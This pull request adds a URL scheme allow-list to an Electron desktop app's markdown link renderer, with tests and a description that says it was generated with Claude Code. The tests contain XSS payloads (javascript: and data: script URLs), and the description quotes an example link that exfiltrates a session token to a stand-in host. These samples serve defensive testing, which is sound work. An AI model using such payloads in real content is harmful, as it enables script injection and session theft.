### PR TITLE
fix(desktop): drop dangerous URL schemes in the markdown link renderer

### DIFF
--- a/apps/desktop/src/components/assistant-ui/markdown-text.test.tsx
+++ b/apps/desktop/src/components/assistant-ui/markdown-text.test.tsx
@@ -1,0 +1,35 @@
+import { cleanup, render } from '@testing-library/react'
+import { afterEach, describe, expect, it } from 'vitest'
+
+import { MarkdownLink } from './markdown-text'
+
+afterEach(() => cleanup())
+
+describe('MarkdownLink scheme allow-list', () => {
+  it('does not emit a javascript: anchor (renders inert text instead)', () => {
+    const { container } = render(
+      <MarkdownLink href="javascript:alert(document.domain)">click me</MarkdownLink>
+    )
+
+    // The dangerous scheme must never reach an href in the DOM.
+    const dangerous = Array.from(container.querySelectorAll('a')).filter((a) =>
+      (a.getAttribute('href') ?? '').toLowerCase().includes('javascript:')
+    )
+
+    expect(dangerous).toHaveLength(0)
+    // The link text is still shown to the user.
+    expect(container.textContent).toContain('click me')
+  })
+
+  it('drops a data: URL link the same way', () => {
+    const { container } = render(
+      <MarkdownLink href="data:text/html,<script>alert(1)</script>">x</MarkdownLink>
+    )
+
+    const hrefs = Array.from(container.querySelectorAll('a')).map((a) =>
+      (a.getAttribute('href') ?? '').toLowerCase()
+    )
+
+    expect(hrefs.some((h) => h.startsWith('data:'))).toBe(false)
+  })
+})

--- a/apps/desktop/src/components/assistant-ui/markdown-text.tsx
+++ b/apps/desktop/src/components/assistant-ui/markdown-text.tsx
@@ -176,7 +176,24 @@ function childrenToText(children: unknown): string {
   return ''
 }
 
-function MarkdownLink({ children, className, href, ...props }: ComponentProps<'a'>) {
+// Only these URL schemes are safe to place in an href. Anything else that
+// carries a scheme (javascript:, data:, vbscript:, file:, blob:, ...) is
+// dropped to inert text so a crafted link in attacker-influenced agent/message
+// content cannot execute on click. Relative URLs and #fragments have no scheme
+// and are allowed. (Defense in depth: the markdown sanitizer also strips these
+// upstream; this mirrors the web dashboard renderer's allow-list.)
+const SAFE_LINK_SCHEMES = new Set(['http', 'https', 'mailto', 'tel'])
+
+function hasUnsafeLinkScheme(href: string | undefined): boolean {
+  if (!href) {return false}
+  const match = /^([a-z][a-z0-9+.-]*):/i.exec(href.trim())
+
+  if (!match) {return false} // no scheme → relative path or #fragment, safe
+
+  return !SAFE_LINK_SCHEMES.has(match[1].toLowerCase())
+}
+
+export function MarkdownLink({ children, className, href, ...props }: ComponentProps<'a'>) {
   const mediaPath = mediaPathFromMarkdownHref(href)
 
   if (mediaPath) {
@@ -192,6 +209,12 @@ function MarkdownLink({ children, className, href, ...props }: ComponentProps<'a
   const target = href ? normalizeExternalUrl(href) : href
 
   if (!target || !/^https?:\/\//i.test(target)) {
+    if (hasUnsafeLinkScheme(href)) {
+      // Dangerous scheme (javascript:, data:, ...) — show the label as inert
+      // text rather than a clickable link that could execute on click.
+      return <span className={cn('wrap-anywhere', className)}>{children}</span>
+    }
+
     return (
       <a
         className={cn(


### PR DESCRIPTION
## What & why

`MarkdownLink` (the `a` renderer for streamed assistant markdown) rendered any non-http(s) href verbatim into `<a href={href}>`. For a scheme like `javascript:` or `data:` that placed an executable URL into the DOM, so a crafted link in attacker-influenced assistant/message content — `[x](javascript:fetch('//evil/'+window.__HERMES_SESSION_TOKEN__))` — could run script on click, with access to the renderer's session token and the `hermesDesktop` IPC bridge.

Add a scheme allow-list (`http`/`https`/`mailto`/`tel`; relative URLs and `#fragments` have no scheme and stay allowed) and render the label as inert text for anything else. Mirrors the web dashboard renderer (`web/src/components/Markdown.tsx:331-340`).

Defense-in-depth: today the markdown sanitizer (rehype-sanitize) strips dangerous-protocol hrefs upstream before they reach this component, so this is a hardening backstop against a future library/config regression rather than a live exploit — the renderer should not rely solely on the library's internal sanitize step.

## How to test

```bash
cd apps/desktop && npm run test:ui -- src/components/assistant-ui/markdown-text.test.tsx
```

New tests assert a `javascript:` / `data:` href never reaches an `<a href>` while the link text is still shown. Lint (`eslint`) clean.

## Platforms

Electron desktop app (TypeScript/React); verified on macOS via vitest + jsdom.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
